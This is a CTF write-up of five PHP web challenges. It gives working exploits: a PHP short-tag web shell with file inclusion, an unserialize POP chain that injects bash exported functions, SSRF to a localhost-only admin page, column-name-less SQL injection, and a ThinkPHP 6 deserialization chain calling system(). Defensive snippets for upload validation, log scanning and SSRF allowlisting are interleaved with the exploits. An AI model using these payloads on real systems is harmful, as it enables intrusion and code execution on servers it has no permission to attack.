Contents
100%_upload
Not just unserialize
EZ_SSRF
hacker
Oyst3rPHP
Still can only do PHP; can't make any headway on Java at all (despair)
100%_upload
There is a file inclusion, so the php:// filter wrapper can be used to read the source:
```
php://filter/read=convert.base64-encode/resource=upload.php
```
```php
<?php
if(isset($_FILES['upfile'])){
$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['upfile']['name']);
$ext = pathinfo($_FILES['upfile']['name'],PATHINFO_EXTENSION);
$text = file_get_contents($_FILES['upfile']['tmp_name']);
echo $ext;
if (!preg_match("/ph.|htaccess/i", $ext)){
if(preg_match("/<\?php/i", $text)){
echo "茂夫说:你的文件内容不太对劲哦<br>";
}
else{
move_uploaded_file($_FILES['upfile']['tmp_name'],$uploadfile);
echo "上传成功<br>路径为:" . $uploadfile . "<br>";
}
}
else {
echo "恶意后缀哦<br>";
}
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>上传文件</title>
<style>
body {
font-family: Arial, sans-serif;
margin: 0;
padding: 0;
background-image: url('100.jpg');
background-size: cover;
background-position: center;
}
.container {
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
}
form {
background-color: rgba(255, 255, 255, 0.8);
padding: 20px;
border-radius: 8px;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
}
input[type="file"] {
margin-bottom: 10px;
}
input[type="submit"] {
background-color: #007bff;
color: #fff;
padding: 10px 15px;
border: none;
border-radius: 4px;
cursor: pointer;
}
input[type="submit"]:hover {
background-color: #0056b3;
}
</style>
</head>
<body>
<div class="container">
<form action="upload.php" method="POST" enctype="multipart/form-data">
<p>请不要上传php脚本哈,不然我们可爱的茂夫要生气啦</p>
<input type="file" name="upfile" value="" />
<br>
<input type="submit" name="submit" value="提交" />
</form>
</div>
</body>
</html>
```
PHP files can't be uploaded, and the content may not contain `<?php` (the check is a substring match, not a prefix check).
So upload an image shell whose content is `<?=eval($_POST[1]);?>`, which the short echo tag lets through,
and combine it with the file inclusion for RCE.
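As an added example (not part of the original writeup), the Python below mirrors the decision logic of the challenge's upload.php beside a hardened version, to show why an image-named file containing `<?=` passes the original checks and how an extension allowlist plus a check for every PHP open tag closes that gap. The function names, `ALLOWED_EXT` and the sample uploads are constructed for this demonstration.

```python
import re
import secrets

# Constructed sample uploads (filename, body) for this demonstration.
SAMPLES = {
    "photo": ("photo.jpg", b"\xff\xd8\xff\xe0JFIF..."),
    "long_tag": ("shell.php", b"<?php system($_GET['c']); ?>"),
    "short_tag": ("shell.jpg", b"<?=eval($_POST[1]);?>"),  # the writeup's bypass
}

def _ext(filename: str) -> str:
    """Extension as pathinfo(basename($name), PATHINFO_EXTENSION) would return it."""
    base = filename.rsplit("/", 1)[-1]
    return base.rsplit(".", 1)[1].lower() if "." in base else ""

def original_check(filename: str, body: bytes) -> bool:
    """Mirror of the challenge's upload.php: extension denylist, then '<?php' in content."""
    if re.search(r"ph.|htaccess", _ext(filename), re.I):
        return False                       # the "malicious extension" branch
    if re.search(rb"<\?php", body, re.I):
        return False                       # the "file content looks wrong" branch
    return True                            # '<?=' is never looked for, so it passes

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
# Every PHP open tag ('<?php', '<?=', bare '<?') starts with '<?'. Legitimate JPEGs with
# XMP metadata also contain '<?xpacket', so re-encoding the image is the robust option.
PHP_OPEN_TAG = re.compile(rb"<\?")

def hardened_check(filename: str, body: bytes) -> bool:
    """Allowlist the extension and reject any PHP open tag, not only '<?php'."""
    if _ext(filename) not in ALLOWED_EXT:
        return False
    return PHP_OPEN_TAG.search(body) is None

def stored_name(filename: str) -> str:
    """Never reuse the client's basename: random name with an allowlisted extension.
    With an include() primitive like this challenge's the content still executes, so
    uploads also belong outside the web root or in a directory with PHP disabled."""
    ext = _ext(filename)
    if ext not in ALLOWED_EXT:
        raise ValueError("extension not allowed")
    return f"{secrets.token_hex(16)}.{ext}"

def review(samples=SAMPLES):
    """Run both checks over the samples: name -> (original_verdict, hardened_verdict)."""
    return {k: (original_check(n, b), hardened_check(n, b)) for k, (n, b) in samples.items()}
```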
Not just unserialize
Challenge info
The shell used for command execution is symlinked to bash; combined with the source below, bash environment-variable injection can be used.
Reference: 我是如何利用环境变量注入执行任意命令 (How I used environment variable injection to execute arbitrary commands) - 跳跳糖
Challenge source:
```php
<?php
highlight_file(__FILE__);
class start
{
public $welcome;
public $you;
public function __destruct()
{
$this->begin0fweb();
}
public function begin0fweb()
{
$p='hacker!';
$this->welcome->you = $p;
}
}
class SE{
public $year;
public function __set($name, $value){
echo ' Welcome to new year! ';
echo($this->year);
}
}
class CR {
public $last;
public $newyear;
public function __tostring() {
if (is_array($this->newyear)) {
echo 'nonono';
return false;
}
if (!preg_match('/worries/i',$this->newyear))
{
echo "empty it!";
return 0;
}
if(preg_match('/^.*(worries).*$/',$this->newyear)) {
echo 'Don\'t be worry';
} else {
echo 'Worries doesn\'t exists in the new year ';
empty($this->last->worries);
}
return false;
}
}
class ET{
public function __isset($name)
{
foreach ($_GET['get'] as $inject => $rce){
putenv("{$inject}={$rce}");
}
system("echo \"Haven't you get the secret?\"");
}
}
if(isset($_REQUEST['go'])){
unserialize(base64_decode($_REQUEST['go']));
}
?>
```
The chain is easy to write:
start::__destruct -> start::begin0fweb -> SE::__set -> CR::__toString -> ET::__isset
exp:
```php
<?php
// The class definitions from the challenge source above must be included first.
$a=new start();
$b=new SE();
$c=new CR();
$d=new ET();
$a->welcome=$b;
$a->you='Z3r4y';
$b->year=$c;
// 'Worries' matches /worries/i but not the case-sensitive /^.*(worries).*$/, so the else branch
// runs empty($this->last->worries) and triggers ET::__isset.
$c->newyear='Worries';
$c->last=$d;
$c->worries='Z3r4y';
echo base64_encode(serialize($a));
//Tzo1OiJzdGFydCI6Mjp7czo3OiJ3ZWxjb21lIjtPOjI6IlNFIjoxOntzOjQ6InllYXIiO086MjoiQ1IiOjM6e3M6NDoibGFzdCI7TzoyOiJFVCI6MDp7fXM6NzoibmV3eWVhciI7czo3OiJXb3JyaWVzIjtzOjc6Indv***JpZXMiO3M6NToiWjNyNHkiO319czozOiJ5b3UiO3M6NToiWjNyNHkiO30=
```
The article mentions that for Bash 4.4 and above: `env $'BASH_FUNC_echo%%=() { id; }' bash -c 'echo hello'`
Combined with the ET class, just pass `get[BASH_FUNC_echo%%]=() { cat /f*; }`.
Final payload:
```
?go=Tzo1OiJzdGFydCI6Mjp7czo3OiJ3ZWxjb21lIjtPOjI6IlNFIjoxOntzOjQ6InllYXIiO086MjoiQ1IiOjM6e3M6NDoibGFzdCI7TzoyOiJFVCI6MDp7fXM6NzoibmV3eWVhciI7czo3OiJXb3JyaWVzIjtzOjc6Indv***JpZXMiO3M6NToiWjNyNHkiO319czozOiJ5b3UiO3M6NToiWjNyNHkiO30=&get[BASH_FUNC_echo%%]=() { cat /f*; }
```
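From the detection side, an added example that is not part of the writeup: a small Python scanner over constructed access-log lines that flags query parameters carrying a bash exported-function definition, either by an environment name of the `BASH_FUNC_echo%%` form used above (or the older `BASH_FUNC_name()` form) or by a value beginning with `() {`. The log lines, `scan_log` and `suspicious_params` are constructed for this demonstration.

```python
import re
from urllib.parse import parse_qsl

# Constructed access-log lines for this demonstration (not from the challenge host).
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?go=Tzo1OiJzdGFydCI6Mjp7&get%5BBASH_FUNC_echo%25%25%5D=()%20%7B%20id%3B%20%7D HTTP/1.1" 200 97',
    '10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /?go=Tzo1OiJzdGFydCI6Mjp7 HTTP/1.1" 200 97',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "POST /?get%5BPATH%5D=/tmp HTTP/1.1" 200 97',
    '10.0.0.8 - - [01/Jan/2024:10:00:03 +0000] "GET /search?q=hello%20world HTTP/1.1" 200 12',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<path>[^ ?"]*)(?:\?(?P<query>[^ "]*))? HTTP/')
# Bash 4.4+ exports functions as BASH_FUNC_name%%; older releases used BASH_FUNC_name().
BASH_FUNC_NAME = re.compile(r"^BASH_FUNC_[A-Za-z_][A-Za-z0-9_]*(?:%%|\(\))$")
# Exported-function body as it appears after URL decoding: "() {".
FUNC_BODY = re.compile(r"^\s*\(\)\s*\{")
PHP_ARRAY_KEY = re.compile(r"\[([^\]]*)\]$")   # get[NAME] -> NAME, as PHP builds $_GET['get']

def suspicious_params(query: str):
    """Return (param, value) pairs that look like a bash function-export injection."""
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        m = PHP_ARRAY_KEY.search(name)
        env_name = m.group(1) if m else name
        if BASH_FUNC_NAME.match(env_name) or FUNC_BODY.match(value):
            hits.append((name, value))
    return hits

def scan_log(lines):
    """Return (client_ip, path, hits) for each request carrying a suspicious parameter."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m or not m.group("query"):
            continue
        hits = suspicious_params(m.group("query"))
        if hits:
            findings.append((line.split(" ", 1)[0], m.group("path"), hits))
    return findings
```

The env name is taken from inside the `[...]` because PHP turns `get[X]=Y` into `$_GET['get']['X']`, which is exactly what the `foreach` in ET::__isset feeds to putenv().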
EZ_SSRF
Challenge info:
Challenge source:
```php
<?php
highlight_file(__file__);
error_reporting(0);
function get($url) {
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($curl);
curl_close($curl);
echo base64_encode($data);
return $data;
}
class client{
public $url;
public $payload;
public function __construct()
{
$url = "http://127.0.0.1/";
$payload = "system(\"cat /flag\");";
echo "Exploit";
}
public function __destruct()
{
get($this->url);
}
}
// hint:hide other file
if(isset($_GET['Harder'])) {
unserialize($_GET['Harder']);
} else {
echo "You don't know how to pass parameters?";
}
?>
```
Directory traversal only goes up as far as /var/www/html, so the /flag file in the filesystem root can't be read directly (a file inclusion point would be another matter).
The challenge also hints that there are other files.
Scan with dirsearch.
Visiting /flag.php gives a blank page, which means it is all PHP code and has to be read in encoded form.
Visiting /admin.php shows the source:
```php
<?php
error_reporting(0);
include "flag.php";
highlight_file(__FILE__);
$allowed_ip = "127.0.0.1";
if ($_SERVER['REMOTE_ADDR'] !== $allowed_ip) {
die("You can't get flag");
} else {
echo $flag;
}
?>
```
It requires the request to come from 127.0.0.1, so a plain SSRF through the client object's __destruct does it.
exp:
```php
<?php
// The client class from the challenge source above must be defined first.
$a=new client();
$a->url="http://127.0.0.1/admin.php";
$a->payload="Z3r4y";
echo serialize($a);
```
Final payload:
```
?Harder=O:6:"client":2:{s:3:"url";s:26:"http://127.0.0.1/admin.php";s:7:"payload";s:5:"Z3r4y";}
```
Base64-decode the returned data to get the flag.
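As a mitigation-side example added here (not from the writeup), the Python below is an allowlist check for a server-side fetch like the page's `get($url)`: it rejects non-HTTP schemes and any destination that is, or resolves to, loopback, private or link-local space, which is exactly what lets the `client` object reach /admin.php as 127.0.0.1. The `fake_resolve` callback and its lookup table are constructed so the example runs offline.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed stand-in for DNS so the example runs offline (real code: socket.getaddrinfo).
FAKE_DNS = {
    "localhost": ["127.0.0.1"],
    "example.com": ["93.184.216.34"],
    "rebind.example": ["93.184.216.34", "127.0.0.1"],  # one public, one loopback answer
    "127.1": ["127.0.0.1"],  # shorthand a libc resolver accepts but ipaddress rejects
}

def fake_resolve(host: str):
    return FAKE_DNS.get(host.lower(), [])

def is_internal(ip: str) -> bool:
    """True for any address a server-side request must never be allowed to reach."""
    a = ipaddress.ip_address(ip)
    if isinstance(a, ipaddress.IPv6Address) and a.ipv4_mapped:
        a = a.ipv4_mapped                      # ::ffff:127.0.0.1 is still loopback
    return (a.is_loopback or a.is_private or a.is_link_local
            or a.is_multicast or a.is_reserved or a.is_unspecified)

def check_fetch_url(url: str, resolve=fake_resolve):
    """Return (allowed, reason, pinned_ip). Connect to the pinned IP you checked,
    not to the hostname again, or a rebinding answer can slip past the check."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed", None      # no gopher://, file://, dict://
    host = parts.hostname
    if not host:
        return False, "missing host", None
    try:
        ips = [str(ipaddress.ip_address(host))]       # literal IPv4 / bracketed IPv6
    except ValueError:
        ips = resolve(host)                           # everything else goes through DNS
    if not ips:
        return False, "unresolvable host", None
    for ip in ips:                                    # every answer must be external
        if is_internal(ip):
            return False, f"resolves to internal address {ip}", None
    return True, "ok", ips[0]
```

Checking the literal alone is not enough: "127.1" and decimal forms are not valid to the strict parser but a libc resolver happily turns them into loopback, so unresolved names must go through the same resolve-then-check path.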
hacker
The comment tells us the flag is in the flag table.
First do a simple fuzz.
information_schema.tables turns out to be banned, so consider column-name-less injection.
Reference: 【CTF】sql注入之无列名注入的姿势 ([CTF] SQL injection: column-name-less injection techniques) - CSDN博客
payload:
```
?username=1'/**/union/**/select/**/`2`/**/from/**/(select/**/1,2/**/union/**/select/**/*/**/from/**/flag)a%23
```
Just try the column count one at a time.
Oyst3rPHP
The logo is obviously ThinkPHP, so this must be a reproduction of some known vulnerability.
The initial page has nothing but an image, so do some information gathering.
dirsearch turns up www.zip.
Visit it, download it, and get the source.
The version is tp6.
The index method of the Index class in index.php contains an unserialize step, preceded by a few textbook bypasses:
md5加密相等绕过 (MD5 equality bypass: different values, strictly equal MD5) - CSDN博客 (because of the string cast, the array bypass doesn't work here)
利用正则回溯最大次数上限绕过preg_match (Bypassing preg_match via the regex backtracking limit) - CSDN博客
Then for the unserialize use this: ThinkPHP v6.0.x反序列化漏洞复现与分析 (ThinkPHP v6.0.x deserialization vulnerability reproduction and analysis) - CSDN博客
With minor changes it works:
```php
<?php
namespace think\model\concern;
trait Attribute
{
private $data = ["key"=>"cat /Oyst3333333r.php"];
private $withAttr = ["key"=>"system"];
}
namespace think;
abstract class Model
{
use model\concern\Attribute;
private $lazySave = true;
protected $withEvent = false;
private $exists = true;
private $force = true;
protected $name;
public function __construct($obj=""){
$this->name=$obj;
}
}
namespace think\model;
use think\Model;
class Pivot extends Model
{}
$a=new Pivot();
$b=new Pivot($a);
echo base64_encode(serialize($b));
```
Final exp:
```python
import requests

url = "http://yuanshen.life:37431/?left=QNKCDZO&right=s878926199a"
# "payload" is the base64 printed by the PHP script above; the value in the page copy is garbled, so it is elided here.
# "key" overruns the PCRE backtracking limit so preg_match fails and the check is bypassed.
data = {
    "key": 'very' * 250000 + "603THINKPHP",
    "payload": "<base64 output of the PHP script above>",
}
res = requests.post(url, data=data)
print(res.text)
```